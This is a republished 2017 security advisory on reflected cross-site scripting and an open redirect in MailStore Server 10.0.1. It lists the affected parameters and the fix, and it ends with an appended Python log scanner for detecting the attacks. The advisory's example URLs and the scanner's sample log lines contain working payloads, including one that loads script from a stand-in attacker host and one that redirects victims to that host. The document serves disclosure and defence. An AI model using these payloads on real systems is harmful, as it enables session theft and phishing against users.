
MailStore 10.0.1 Cross Site Scripting / Open Redirect

01 Feb 2017 | Reported by Tobias Glemser | Type: packetstorm | Source: packetstormsecurity.com

Reflected XSS and Open Redirect in MailStore Server version 10.0.

Code
`secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server  
  
Affected Products  
MailStore Server Version 10.0.1.12148 was tested  
according to the vendor:  
- MailStore 9.2 to 10.0.1 is affected by the Reflected XSS Vulnerability  
- Mailstore 9.0 to 10.0.1 is affected by the Open Redirect Vulnerability  
  
References  
https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt  
CWE-79 https://cwe.mitre.org/data/definitions/79.html  
CWE-601 https://cwe.mitre.org/data/definitions/601.html  
  
Summary:  
"MailStore Server is one of the world's leading solutions for email archiving,   
management and compliance for small and medium-sized businesses."  
  
The built-in web application does not properly validate untrusted input in   
several parameters. This leads to both reflected Cross-Site Scripting (XSS)   
and an Open Redirect.  
  
Effect:  
To exploit the reflected XSS, the victim has to be authenticated to the   
MailStore web application. By clicking on a link sent to a victim, an attacker   
could for example copy the victim's session ID to his own data sink.  
  
Sending another link with a crafted URL, the attacker could redirect the   
victim to a malicious website, while the link itself points to the trusted   
Mailstore-Address. The victim is not required to be authenticated.  
  
Vulnerable Scripts Reflected XSS for authenticated users:  
/search-result/, Parameters c-f, c-q, c-from and c-to   
/message/ajax/send/, Parameter recipient  
  
Vulnerable Script Open Redirect:  
derefer/, Parameter url  
  
Example for reflected XSS:  
https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E  
#Load external JS-Code  
https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E  
  
Example for Open Redirect:  
https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de  
  
Solution:  
Update to Version 10.0.2  
  
Disclosure Timeline:  
2017/01/09 vendor contacted  
2017/01/10 initial vendor response asking for technical details  
2017/01/10 provided vendor with the advisory including technical details  
2017/01/13 vendor provided information about affected versions and mitigation  
2017/01/18 update published by vendor  
2017/01/31 public disclosure  
  
Credits:  
Tobias Glemser  
[email protected]  
secuvera GmbH  
https://www.secuvera.de  
  
Disclaimer:  
All information is provided without warranty. The intent is to  
provide information to secure infrastructure and/or systems, not  
to be able to attack or damage. Therefore secuvera shall  
not be liable for any direct or indirect damages that might be  
caused by using this information.  
  
  
`
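
A defender-side check for the endpoints listed in the advisory, added here as an example and not part of the secuvera advisory or of MailStore: it scans web access logs for markup in the named parameters and for `derefer/` targets outside the instance's own host names. The combined log format, the `TRUSTED_HOSTS` set and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

XSS_PARAMS = {  # endpoints and parameters named in the advisory
    "/search-result/": ("c-f", "c-q", "c-from", "c-to"),
    "/message/ajax/send/": ("recipient",),
}
REDIRECT_PATH, REDIRECT_PARAM = "/derefer/", "url"
TRUSTED_HOSTS = {"www.example.com"}  # assumption: this instance's own host names
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"[<>]")  # tag delimiters left after percent-decoding

def findings_for(target):
    """Return (kind, parameter, decoded value) tuples for one request target."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    found = []
    for suffix, params in XSS_PARAMS.items():
        if parts.path.endswith(suffix):
            found += [("xss-markup", n, v) for n in params
                      for v in query.get(n, []) if MARKUP.search(v)]
    if parts.path.endswith(REDIRECT_PATH):
        for value in query.get(REDIRECT_PARAM, []):
            host = urlsplit(value.strip()).hostname  # also covers //host/path
            if host and host not in TRUSTED_HOSTS:
                found.append(("external-redirect", REDIRECT_PARAM, value))
    return found

def scan(lines):
    """Return (line number, kind, parameter, value) for each flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            try:
                hits += [(number, *f) for f in findings_for(match.group(1))]
            except ValueError:  # urlsplit rejects e.g. a malformed IPv6 literal
                hits.append((number, "unparseable", "", match.group(1)))
    return hits

# Constructed sample lines (combined log format, documentation-range client IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2017:10:00:00 +0000] "GET /a/10.0.1.12148/search-result/?c-q=invoice&c-f=all HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Feb/2017:10:00:05 +0000] "GET /a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E HTTP/1.1" 200 5201',
    '192.0.2.12 - - [01/Feb/2017:10:00:09 +0000] "GET /a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de HTTP/1.1" 302 0',
    '192.0.2.13 - - [01/Feb/2017:10:00:12 +0000] "GET /a/10.0.1.12148/derefer/?url=https%3A%2F%2Fwww.example.com%2Fhelp HTTP/1.1" 302 0',
]
if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Only parameters carried in the query string are visible in an access log; values sent in a request body are not covered by this check.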
